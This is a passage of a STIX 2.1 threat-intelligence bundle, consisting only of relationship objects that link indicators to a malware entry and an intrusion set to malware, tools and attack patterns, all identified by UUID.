"malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--42bf2d28-c2f1-54ea-81d3-b0d35c4e2922", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917416Z", "modified": "2026-06-16T16:01:05.917416Z", "relationship_type": "indicates", "source_ref": "indicator--7498262d-91f9-5ca3-8c7d-e863bc95573c", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--182ca275-d3d8-50a5-b347-deafd75360d8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91751Z", "modified": "2026-06-16T16:01:05.91751Z", "relationship_type": "indicates", "source_ref": "indicator--5f27cbd1-b0e1-5a47-8bbd-eeda913d66b6", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--349affed-0554-5a79-a664-c79fdbab5e3c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917613Z", "modified": "2026-06-16T16:01:05.917613Z", "relationship_type": "indicates", "source_ref": "indicator--9c3b5e98-ab10-510b-801f-873c03487eaf", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1da00a53-7feb-5197-aa66-110733ac121a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917708Z", "modified": "2026-06-16T16:01:05.917708Z", "relationship_type": "indicates", "source_ref": "indicator--4da6c2a5-f0df-59b0-9856-94942d275229", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--60b0c086-8b26-5b47-b8dc-7997b33f4d2e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917816Z", "modified": "2026-06-16T16:01:05.917816Z", "relationship_type": "indicates", "source_ref": "indicator--49dc64d0-0e5d-5340-9b00-7a7e87c4a816", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b920ff5d-bf76-509e-b9c0-83af52ebb478", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.917939Z", "modified": "2026-06-16T16:01:05.917939Z", "relationship_type": "indicates", "source_ref": "indicator--11b20550-5ce3-5ea2-b462-94164521783c", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bf16bec1-fb9b-5b26-bace-aaf09b59ac07", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918066Z", "modified": "2026-06-16T16:01:05.918066Z", "relationship_type": "indicates", "source_ref": "indicator--baa71619-f784-57db-80ae-d0ea3922f656", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--378c35e7-3a8d-5ece-af0f-5ea3b98c8f3b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918219Z", "modified": "2026-06-16T16:01:05.918219Z", "relationship_type": "indicates", "source_ref": "indicator--434b0ca1-c98e-5c26-86f3-73d6788c4dfe", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c0512f4b-753d-5772-a070-4a53dc498d1b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918353Z", "modified": "2026-06-16T16:01:05.918353Z", "relationship_type": "indicates", "source_ref": "indicator--331713cc-10fb-543f-9cb7-45b805110306", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--969748d1-21b4-589e-acea-4a402e820cce", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918515Z", "modified": "2026-06-16T16:01:05.918515Z", "relationship_type": "indicates", "source_ref": "indicator--f0f627f2-43a3-511b-b5ac-7e53f9f64505", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a8bdd18d-a618-5832-adb3-be11f2f6d8d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918664Z", "modified": "2026-06-16T16:01:05.918664Z", "relationship_type": "indicates", "source_ref": "indicator--25ca63e0-4b15-5dea-aa67-bf46f23f0b62", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--985e9d8f-801e-5bb1-a0b5-29052e9b7279", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918811Z", "modified": "2026-06-16T16:01:05.918811Z", "relationship_type": "indicates", "source_ref": "indicator--63359c8f-c8a9-575c-b159-d3aadf6aa65a", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--862bc02c-c12a-5f9a-a79b-8347bb669122", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.918961Z", "modified": "2026-06-16T16:01:05.918961Z", "relationship_type": "indicates", "source_ref": "indicator--32e771d5-8281-5980-ae1e-092312421772", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cf744091-781b-5cf0-93a3-9522facd9712", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919077Z", "modified": "2026-06-16T16:01:05.919077Z", "relationship_type": "indicates", "source_ref": "indicator--fe382a31-3d9d-5103-9806-6fc1f9f9569e", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d89e0f63-0daf-5033-b4e9-c04ab2066355", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919241Z", "modified": "2026-06-16T16:01:05.919241Z", "relationship_type": "indicates", "source_ref": "indicator--8a730355-b58a-54de-a0f1-f4f9c0256984", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8ee5ac72-a6c1-5572-a22c-a36177c4d60b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919379Z", "modified": "2026-06-16T16:01:05.919379Z", "relationship_type": "indicates", "source_ref": "indicator--9a188779-7721-514c-b204-a997f9f1aa58", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d1981f9f-a72b-5dd1-9169-cff6497f76c3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919485Z", "modified": "2026-06-16T16:01:05.919485Z", "relationship_type": "indicates", "source_ref": "indicator--493bd6bd-20eb-566b-9801-42d47f6a129f", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--38b2670e-bdb5-593c-bb15-da73685ea808", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91959Z", "modified": "2026-06-16T16:01:05.91959Z", "relationship_type": "indicates", "source_ref": "indicator--4bd77b51-b3db-5d34-8a6f-6f2c7e5798fb", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1c651ce3-24cc-503f-b594-ecc9d7f5a818", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919686Z", "modified": "2026-06-16T16:01:05.919686Z", "relationship_type": "indicates", "source_ref": "indicator--b85c50c9-5db6-55e8-9fde-73c5581b40d8", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7d76a362-701a-5b44-ac66-a29ea0a185ee", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919783Z", "modified": "2026-06-16T16:01:05.919783Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f1e74a20-22a7-527b-ba9a-8f12d30beaaa", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.91988Z", "modified": "2026-06-16T16:01:05.91988Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--96f1c610-2136-54b3-85af-cdad77cfaeac", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.919976Z", "modified": "2026-06-16T16:01:05.919976Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8f7391e0-09ee-5a6e-ba49-be0645c41dc5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.920301Z", "modified": "2026-06-16T16:01:05.920301Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--782a6c93-7042-5644-a572-ee5bf6eca9e6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.920413Z", "modified": "2026-06-16T16:01:05.920413Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--256fd1d4-f60a-5f99-8714-74adcde93708", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.922759Z", "modified": "2026-06-16T16:01:05.922759Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--2bdd9e17-1bc2-5b20-9c9e-400008f89e39", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--631696b6-0533-5442-b112-eb397840fe63", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.922855Z", "modified": "2026-06-16T16:01:05.922855Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--699024e5-ddbb-5d31-ab4e-824885ce72f2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--effc21b7-8aa5-507b-99ea-09a35b354a3e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.922951Z", "modified": "2026-06-16T16:01:05.922951Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--43a84cf5-99b5-5dbe-a46b-8d8d27ac53cc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--791f3fa3-aa22-5564-ba13-51a9ea6edd7e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92305Z", "modified": "2026-06-16T16:01:05.92305Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--15c54f25-b627-5184-90fe-9842800f2d97", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ae9f13ee-f2f0-51eb-b053-54389b36494a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923146Z", "modified": "2026-06-16T16:01:05.923146Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--1cc70a78-f3d6-5865-9865-3a435d95ccf5", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--70a29de1-ae87-5655-be58-21c349580a80", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923242Z", "modified": "2026-06-16T16:01:05.923242Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--12cf3313-c71e-518a-b3e0-09b465a1957a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--234eda9c-a8ff-5e24-97ad-74265a421363", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923338Z", "modified": "2026-06-16T16:01:05.923338Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--6915be9d-0954-5531-83b3-9fe82df05038", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3acc3bb2-0b6f-5130-b42a-d249a11466a3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923433Z", "modified": "2026-06-16T16:01:05.923433Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--03be7702-b2db-5525-8ea7-c0fab3e9a166", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4aa1c9b2-b9dc-5b97-bed4-993ffe8e861c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923527Z", "modified": "2026-06-16T16:01:05.923527Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--4f9b6f95-675f-5f47-86cd-0b0fc145ff10", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e2e08961-9f79-554e-b39b-54efd27fa27e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923622Z", "modified": "2026-06-16T16:01:05.923622Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--71b0bc4d-a8fb-5daa-ba54-6ee690701d21", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--267cfa62-0ee1-585c-88fa-9add598e9ced", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923719Z", "modified": "2026-06-16T16:01:05.923719Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--ac7e057e-c3ac-5507-8842-bf16632d42ea", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7cb694c5-cd13-5803-b72e-2172c9ddeb24", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923821Z", "modified": "2026-06-16T16:01:05.923821Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "tool--cf7a60ed-7084-5e8b-8d1a-e7a519c20e75", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ea47aa56-f22f-537b-b591-e548d2640f3f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.923939Z", "modified": "2026-06-16T16:01:05.923939Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4a14affe-0b74-5be7-b326-be4f37b5ad65", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924052Z", "modified": "2026-06-16T16:01:05.924052Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b000c79f-0c04-5737-abff-42c85caec75d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924213Z", "modified": "2026-06-16T16:01:05.924213Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f810be25-74b0-540f-8409-185e96c651e6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924375Z", "modified": "2026-06-16T16:01:05.924375Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7346f213-b5d1-5735-bfc2-767fa494c1a4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924511Z", "modified": "2026-06-16T16:01:05.924511Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8623f537-e065-5011-8aa2-48c78adc03f2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924643Z", "modified": "2026-06-16T16:01:05.924643Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--428110b8-7ebd-53de-99d9-74ee81c407f9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924794Z", "modified": "2026-06-16T16:01:05.924794Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0f43702b-7d67-5f1e-a652-dcab069381f1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.924917Z", "modified": "2026-06-16T16:01:05.924917Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0dd606a6-3506-5d90-9da4-caab57e25845", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925058Z", "modified": "2026-06-16T16:01:05.925058Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--150e92b1-d203-5492-b22a-850a3bd45a4d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925186Z", "modified": "2026-06-16T16:01:05.925186Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ceaf3148-8ca5-51df-bdd0-2b287e4a3c9c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925336Z", "modified": "2026-06-16T16:01:05.925336Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--21d4ada3-be8b-5e8a-8742-445e9a8f621a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925496Z", "modified": "2026-06-16T16:01:05.925496Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fc638a09-5f8f-5a03-a57c-796d1bab3ab3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92565Z", "modified": "2026-06-16T16:01:05.92565Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6c7680ba-546f-52ca-a808-c6000e59670b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925814Z", "modified": "2026-06-16T16:01:05.925814Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1229ad2d-06b1-579e-ad01-9ab58e3b91c4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.925919Z", "modified": "2026-06-16T16:01:05.925919Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--946ba203-6261-5545-bea8-fa1d8479d6a4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926016Z", "modified": "2026-06-16T16:01:05.926016Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e9d09ea3-1676-569f-9be3-0271a5f894e0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92615Z", "modified": "2026-06-16T16:01:05.92615Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--651f96aa-e3de-503f-ba4c-2ba371ef0f71", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926268Z", "modified": "2026-06-16T16:01:05.926268Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": 